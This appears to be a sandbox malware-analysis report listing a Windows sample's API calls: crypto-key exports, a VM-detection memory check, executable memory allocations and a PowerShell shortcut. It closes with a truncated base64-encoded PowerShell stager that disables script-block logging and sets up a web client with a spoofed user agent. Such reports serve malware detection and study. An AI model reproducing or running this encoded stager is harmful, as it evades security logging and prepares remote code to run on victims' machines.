WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ed','NonPublic,Static').SEtVAlUE($nUll,$TRue);};[SYSTeM.NeT.SErvIcEPOInTMAnAger console_handle: 0x0000023b	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ]::EXpeCT100CONTiNUe=0;$566=NEw-OBJeCt SysTem.NEt.WeBCLIent;$u='Mozilla/5.0 (Wi console_handle: 0x00000247	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ndows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TexT.ENCODING]:: console_handle: 0x00000253	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00496708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004959c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004959c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00495888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 12, 2024, 9:41 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 163 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73961000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73962000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b4e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b4f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBJAE8AbgBUAGEAYgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAAMwApAHsAJAA4ADIAMgA9AFsAUgBlAGYAXQAuAEEAcwBzAEUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAA4ADIAMgApAHsAJAAxADkAMQA9ACQAOAAyADIALgBHAGUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwAKQA7AEkARgAoACQAMQA5ADEAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAE8ATABMAEUAYwB0AGkATwBuAFMALgBHAEUAbgBFAHIAaQBDAC4ARABJAGMAdABJAE8ATgBBAHIAWQBbAFMAdABSAEkATgBHACwAUwBZAHMAdABlAG0ALgBPAEIAagBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAdgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAAxADkAMQBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEAbAB9AEUAbABzAGUAewBbAFMAQwBSAGkAcABUAEIATABvAEMAawBdAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAGwAVQBlACgAJABuAFUATABMACwAKABOAEUAVwAtAE8AYgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABJAG8AbgBTAC4ARwBlAG4ARQBSAEkAYwAuAEgAYQBTAGgAUwBlAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBmAF0ALgBBAFMAUwBFAG0AQgBsAHkALgB